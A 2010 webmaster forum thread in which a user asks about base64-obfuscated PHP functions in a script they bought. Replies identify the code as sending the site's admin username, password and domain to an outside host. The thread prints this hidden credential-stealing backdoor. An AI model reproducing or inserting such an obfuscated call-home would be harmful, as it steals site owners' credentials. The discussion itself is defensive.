Results 1 to 7 of 7
-
10th Feb 2010, 08:47 AM #1OPMemberWebsite's:
HieBye.com BinEdris.combase64_decode help
If some one can help me explain this
Code:function problem($error) { ih(); echo iot('<font color="FF0000" size=3>ERROR</font><br><br>'.$error); ift(); } function b72($a) { global $s; $r = fetchURL(str_replace(' ','',base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9'). "$s[cs]&u=$a[p_user]&p=$a[p_pass]&d=$a[p_domain]&url=$a[site_url]")); if ($r) return $r; return false; } function b63($a) { global $s; $sb = fopen("$s[phppath]/data/info.php",'w'); fwrite($sb,'<?PHP $info = base64_decode(\''.$a.'\'); ?>'); fclose($sb); if ($r[0]) return $r[0]; return false; }
And this
Code:function publisher_deleted($in) { global $s; check_admin('publishers'); publisher_delete_process($in[n]); if ($s[no_stop]) return false; ih(); echo iot('Selected publisher has been deleted'); if ($in[return_to]) echo '<a href="'.$in[return_to].'">Back to previous page</a><br><br>'; ift(); } $s[sp] = base64_decode('aHR0cDovLzNidi5iaXovY2gvMi5waHA/c2M9').$s[cs].'&x=';
It would be really helpful for mewCruiser Reviewed by wCruiser on . base64_decode help If some one can help me explain this function problem($error) { ih(); echo iot('<font color="FF0000" size=3>ERROR</font><br><br>'.$error); ift(); } function b72($a) { global $s; $r = fetchURL(str_replace(' ','',base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9'). "$s&u=$a&p=$a&d=$a&url=$a")); Rating: 5
-
10th Feb 2010, 09:10 AM #2MemberWebsite's:
litewarez.net litewarez.com triniwarez.comWhat this is doing is sending your pass and username to another script
lol this is what hackers use to get your ps
PHP Code:"$s[cs]&u=$a[p_user]&p=$a[p_pass]&d=$a[p_domain]&url=$a[site_url]"
PHP Code:"?u=USER&p=PASS&d=DOMAIN&url=SCRIPT_URL"
Join Litewarez.net today and become apart of the community.
Unique | Clean | Advanced (All with you in mind)
Downloads | Webmasters
Notifications,Forum,Chat,Community all at Litewarez Webmasters
-
10th Feb 2010, 09:44 AM #3Super Member
I really hope you're not using this code o.o
So kiss me and smile for me, say that you'll wait for me <'3
-
10th Feb 2010, 10:07 AM #4
-
10th Feb 2010, 04:33 PM #5OPMemberWebsite's:
HieBye.com BinEdris.comI actually brought this script .Want to make sure its safe
-
10th Feb 2010, 05:38 PM #6Member
base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9'):
base64_decode('aHR0cDovLzNidi5iaXovY2gvMi5waHA/c2M9')
Hope this helps in some way
-
11th Feb 2010, 02:21 PM #7OPMemberWebsite's:
HieBye.com BinEdris.comAny idea how to stop sending this code ?
Figured it out ...
thanks
Sponsored Links
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
themaCreator - create posts from...
Version 3.47 released. Open older version (or...